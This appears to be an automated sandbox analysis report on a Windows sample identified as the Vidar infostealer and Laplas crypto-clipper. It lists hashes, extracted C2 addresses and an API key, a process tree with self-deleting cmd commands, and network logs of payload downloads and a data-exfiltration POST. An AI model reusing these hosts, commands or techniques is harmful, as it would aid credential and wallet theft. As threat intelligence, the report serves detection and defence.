Analysis

  • max time kernel
    108s
  • max time network
    114s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    12-04-2023 11:40

General

  • Target

    b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe

  • Size

    471KB

  • MD5

    7726ff8db0d30ab03e9548ba7fe27446

  • SHA1

    6240309f1205990256778c7d1951a5b095806931

  • SHA256

    b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0

  • SHA512

    8faeffc97b9e12d5584c532eae7a62a1ff12edf9dc43c8c058c6bdbb4c367be1b47a6ee8da0932f4301f161de3aabb16b2300f436290dddbd5186e850770d19a

  • SSDEEP

    12288:DcZT8vz5dXe8c8j4i5RleOkDT6s9Qwze:DOT6k8siXtk/JQd

Malware Config

Extracted

Family

vidar

Version

3.4

Botnet

e749025c61b2caca10aa829a9e1a65a1

C2

https://steamcommunity.com/profiles/76561199494593681

https://t.me/auftriebs

Attributes
  • profile_id_v2

    e749025c61b2caca10aa829a9e1a65a1

  • user_agent

    Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0

Extracted

Family

laplas

C2

http://185.106.92.74

Attributes
  • api_key

    bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
    "C:\Users\Admin\AppData\Local\Temp\b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4108
    • C:\ProgramData\64403928983640567900.exe
      "C:\ProgramData\64403928983640567900.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\64403928983640567900.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:700
        • C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 0
          4⤵
            PID:1968
      • C:\ProgramData\28613429787745026787.exe
        "C:\ProgramData\28613429787745026787.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4628
        • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
          "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:2416
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe" & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2200
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 6
          3⤵
          • Delays execution with timeout.exe
          PID:3376
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 2092
        2⤵
        • Program crash
        PID:1328
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4108 -ip 4108
      1⤵
        PID:2772

      Network

      • flag-us
        DNS
        163.252.72.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        163.252.72.23.in-addr.arpa
        IN PTR
        Response
        163.252.72.23.in-addr.arpa
        IN PTR
        a23-72-252-163.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        228.249.119.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        228.249.119.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        71.31.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        71.31.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        t.me
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        8.8.8.8:53
        Request
        t.me
        IN A
        Response
        t.me
        IN A
        149.154.167.99
      • flag-nl
        GET
        https://t.me/auftriebs
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        149.154.167.99:443
        Request
        GET /auftriebs HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
        Host: t.me
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Wed, 12 Apr 2023 11:40:18 GMT
        Content-Type: text/html; charset=utf-8
        Content-Length: 12361
        Connection: keep-alive
        Set-Cookie: stel_ssid=4ee4cb3f10cdc6e4a7_16922301135242178653; expires=Thu, 13 Apr 2023 11:40:18 GMT; path=/; samesite=None; secure; HttpOnly
        Pragma: no-cache
        Cache-control: no-store
        X-Frame-Options: ALLOW-FROM https://web.telegram.org
        Content-Security-Policy: frame-ancestors https://web.telegram.org
        Strict-Transport-Security: max-age=35768000
      • flag-de
        GET
        http://195.201.44.70/
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        195.201.44.70:80
        Request
        GET / HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.44.70
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 12 Apr 2023 11:40:18 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        GET
        http://195.201.44.70/download.zip
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        195.201.44.70:80
        Request
        GET /download.zip HTTP/1.1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.44.70
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 12 Apr 2023 11:40:18 GMT
        Content-Type: application/zip
        Content-Length: 2685679
        Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
        Connection: keep-alive
        ETag: "631f30d3-28faef"
        Accept-Ranges: bytes
      • flag-de
        POST
        http://195.201.44.70/
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        195.201.44.70:80
        Request
        POST / HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        X-Token: 000759fc24095bf4ea3a603e447ba563
        X-hwid: bb00a92e19a92127370785-7669410e-8e67-41c6-8402-8218-806e6f6e6963
        Content-Type: multipart/form-data; boundary=----3542125965940843
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.44.70
        Content-Length: 98691
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 12 Apr 2023 11:40:24 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-us
        DNS
        99.167.154.149.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        99.167.154.149.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        22.249.124.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        22.249.124.192.in-addr.arpa
        IN PTR
        Response
        22.249.124.192.in-addr.arpa
        IN PTR
        cloudproxy10022.sucuri.net
      • flag-us
        DNS
        70.44.201.195.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        70.44.201.195.in-addr.arpa
        IN PTR
        Response
        70.44.201.195.in-addr.arpa
        IN PTR
        static.70.44.201.195.clients.your-server.de
      • flag-us
        DNS
        transfer.sh
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        8.8.8.8:53
        Request
        transfer.sh
        IN A
        Response
        transfer.sh
        IN A
        144.76.136.153
      • flag-de
        GET
        https://transfer.sh/get/lqTwP6/pipka.exe
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        144.76.136.153:443
        Request
        GET /get/lqTwP6/pipka.exe HTTP/1.1
        Host: transfer.sh
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Wed, 12 Apr 2023 11:40:25 GMT
        Content-Type: application/x-ms-dos-executable
        Content-Length: 4514816
        Connection: keep-alive
        Cache-Control: no-store
        Content-Disposition: attachment; filename="pipka.exe"
        Retry-After: Wed, 12 Apr 2023 13:40:24 GMT
        X-Made-With: <3 by DutchCoders
        X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
        X-Ratelimit-Limit: 10
        X-Ratelimit-Rate: 600
        X-Ratelimit-Remaining: 9
        X-Ratelimit-Reset: 1681299624
        X-Remaining-Days: n/a
        X-Remaining-Downloads: n/a
        X-Served-By: Proudly served by DutchCoders
        Strict-Transport-Security: max-age=63072000
      • flag-de
        GET
        https://transfer.sh/get/8n86mq/sima.exe
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        144.76.136.153:443
        Request
        GET /get/8n86mq/sima.exe HTTP/1.1
        Host: transfer.sh
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Wed, 12 Apr 2023 11:40:27 GMT
        Content-Type: application/x-ms-dos-executable
        Content-Length: 7567360
        Connection: keep-alive
        Cache-Control: no-store
        Content-Disposition: attachment; filename="sima.exe"
        Retry-After: Wed, 12 Apr 2023 13:40:30 GMT
        X-Made-With: <3 by DutchCoders
        X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
        X-Ratelimit-Limit: 10
        X-Ratelimit-Rate: 600
        X-Ratelimit-Remaining: 9
        X-Ratelimit-Reset: 1681299630
        X-Remaining-Days: n/a
        X-Remaining-Downloads: n/a
        X-Served-By: Proudly served by DutchCoders
        Strict-Transport-Security: max-age=63072000
      • flag-us
        DNS
        153.136.76.144.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        153.136.76.144.in-addr.arpa
        IN PTR
        Response
        153.136.76.144.in-addr.arpa
        IN PTR
        transfer.sh
      • flag-us
        DNS
        67.55.52.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        67.55.52.23.in-addr.arpa
        IN PTR
        Response
        67.55.52.23.in-addr.arpa
        IN PTR
        a23-52-55-67.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        176.25.221.88.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        176.25.221.88.in-addr.arpa
        IN PTR
        Response
        176.25.221.88.in-addr.arpa
        IN PTR
        a88-221-25-176.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        123.108.74.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        123.108.74.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        209.205.72.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        209.205.72.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        157.123.68.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        157.123.68.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        151.122.125.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        151.122.125.40.in-addr.arpa
        IN PTR
        Response
      • flag-de
        GET
        http://185.106.92.74/bot/regex
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/regex HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Wed, 12 Apr 2023 11:41:05 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 633
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Wed, 12 Apr 2023 11:41:05 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 2
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/regex
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/regex HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Wed, 12 Apr 2023 11:42:01 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 633
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Wed, 12 Apr 2023 11:42:01 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 2
        Connection: keep-alive
      • flag-us
        DNS
        74.92.106.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        74.92.106.185.in-addr.arpa
        IN PTR
        Response
        74.92.106.185.in-addr.arpa
        IN PTR
        instance25567waicorenetwork
      • 149.154.167.99:443
        https://t.me/auftriebs
        tls, http
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        1.6kB
        19.5kB
        24
        20

        HTTP Request

        GET https://t.me/auftriebs

        HTTP Response

        200
      • 195.201.44.70:80
        http://195.201.44.70/
        http
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        207.1kB
        2.8MB
        2065
        2019

        HTTP Request

        GET http://195.201.44.70/

        HTTP Response

        200

        HTTP Request

        GET http://195.201.44.70/download.zip

        HTTP Response

        200

        HTTP Request

        POST http://195.201.44.70/

        HTTP Response

        200
      • 144.76.136.153:443
        https://transfer.sh/get/8n86mq/sima.exe
        tls, http
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        412.0kB
        12.5MB
        8944
        8927

        HTTP Request

        GET https://transfer.sh/get/lqTwP6/pipka.exe

        HTTP Response

        200

        HTTP Request

        GET https://transfer.sh/get/8n86mq/sima.exe

        HTTP Response

        200
      • 20.189.173.6:443
        322 B
        7
      • 185.106.92.74:80
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        http
        svcservice.exe
        916 B
        2.3kB
        10
        9

        HTTP Request

        GET http://185.106.92.74/bot/regex

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/regex

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

        HTTP Response

        200
      • 8.8.8.8:53
        163.252.72.23.in-addr.arpa
        dns
        72 B
        137 B
        1
        1

        DNS Request

        163.252.72.23.in-addr.arpa

      • 8.8.8.8:53
        228.249.119.40.in-addr.arpa
        dns
        73 B
        159 B
        1
        1

        DNS Request

        228.249.119.40.in-addr.arpa

      • 8.8.8.8:53
        71.31.126.40.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        71.31.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        t.me
        dns
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        50 B
        66 B
        1
        1

        DNS Request

        t.me

        DNS Response

        149.154.167.99

      • 8.8.8.8:53
        99.167.154.149.in-addr.arpa
        dns
        73 B
        166 B
        1
        1

        DNS Request

        99.167.154.149.in-addr.arpa

      • 8.8.8.8:53
        22.249.124.192.in-addr.arpa
        dns
        73 B
        113 B
        1
        1

        DNS Request

        22.249.124.192.in-addr.arpa

      • 8.8.8.8:53
        70.44.201.195.in-addr.arpa
        dns
        72 B
        129 B
        1
        1

        DNS Request

        70.44.201.195.in-addr.arpa

      • 8.8.8.8:53
        transfer.sh
        dns
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        57 B
        73 B
        1
        1

        DNS Request

        transfer.sh

        DNS Response

        144.76.136.153

      • 8.8.8.8:53
        153.136.76.144.in-addr.arpa
        dns
        73 B
        98 B
        1
        1

        DNS Request

        153.136.76.144.in-addr.arpa

      • 8.8.8.8:53
        67.55.52.23.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        67.55.52.23.in-addr.arpa

      • 8.8.8.8:53
        176.25.221.88.in-addr.arpa
        dns
        72 B
        137 B
        1
        1

        DNS Request

        176.25.221.88.in-addr.arpa

      • 8.8.8.8:53
        123.108.74.40.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        123.108.74.40.in-addr.arpa

      • 8.8.8.8:53
        209.205.72.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        209.205.72.20.in-addr.arpa

      • 8.8.8.8:53
        157.123.68.40.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        157.123.68.40.in-addr.arpa

      • 8.8.8.8:53
        151.122.125.40.in-addr.arpa
        dns
        73 B
        159 B
        1
        1

        DNS Request

        151.122.125.40.in-addr.arpa

      • 8.8.8.8:53
        74.92.106.185.in-addr.arpa
        dns
        72 B
        115 B
        1
        1

        DNS Request

        74.92.106.185.in-addr.arpa

      Downloads

      • C:\ProgramData\28613429787745026787.exe

        Filesize

        7.2MB

        MD5

        c5e0fb4ecaa8a7481a283099d604f7a0

        SHA1

        df4b0c0cc823da2b0443076650c292b43dd9de33

        SHA256

        c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42

        SHA512

        375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57

      • C:\ProgramData\64403928983640567900.exe

        Filesize

        4.3MB

        MD5

        c4ab3149ef02a36d663699a8c541933e

        SHA1

        67088f5eff9ec575775b711c9e3650d12d7f4d5c

        SHA256

        0a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce

        SHA512

        88b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4

      • C:\ProgramData\mozglue.dll

        Filesize

        593KB

        MD5

        c8fd9be83bc728cc04beffafc2907fe9

        SHA1

        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

        SHA256

        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

        SHA512

        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

      • C:\ProgramData\nss3.dll

        Filesize

        2.0MB

        MD5

        1cc453cdf74f31e4d913ff9c10acdde2

        SHA1

        6e85eae544d6e965f15fa5c39700fa7202f3aafe

        SHA256

        ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

        SHA512

        dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

      • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe

        Filesize

        830.2MB

        MD5

        58c4c1e65779c5b0ee7e6409741c66bc

        SHA1

        2a4daebb8fd8a776e1066aa28ba98755b8277a1c

        SHA256

        2c286abfebc0b51165e0a0db67fb5b165a700b548b0d6bec58418c8d6322ddbb

        SHA512

        f98cc2e64c134c0783d4bae9cf11ed686abe7e3313ecf7e1e25bfee0c98f214d7f157814dfdecbb24464cf696757b8d632a3ce98819d5e1001e4ab35dfb19547

      • memory/1668-229-0x0000000000E40000-0x0000000001CA3000-memory.dmp

        Filesize

        14.4MB

      • memory/2416-259-0x00000000012D0000-0x00000000012D1000-memory.dmp

        Filesize

        4KB

      • memory/2416-260-0x00000000014C0000-0x00000000014C1000-memory.dmp

        Filesize

        4KB

      • memory/2416-261-0x0000000000180000-0x0000000000CBA000-memory.dmp

        Filesize

        11.2MB

      • memory/4108-144-0x0000000061E00000-0x0000000061EF3000-memory.dmp

        Filesize

        972KB

      • memory/4108-246-0x0000000000400000-0x000000000081A000-memory.dmp

        Filesize

        4.1MB

      • memory/4108-220-0x0000000000400000-0x000000000081A000-memory.dmp

        Filesize

        4.1MB

      • memory/4108-134-0x00000000009B0000-0x0000000000A07000-memory.dmp

        Filesize

        348KB

      • memory/4628-241-0x00000000006E0000-0x00000000006E1000-memory.dmp

        Filesize

        4KB

      • memory/4628-242-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

        Filesize

        4KB

      • memory/4628-243-0x0000000000D10000-0x000000000184A000-memory.dmp

        Filesize

        11.2MB
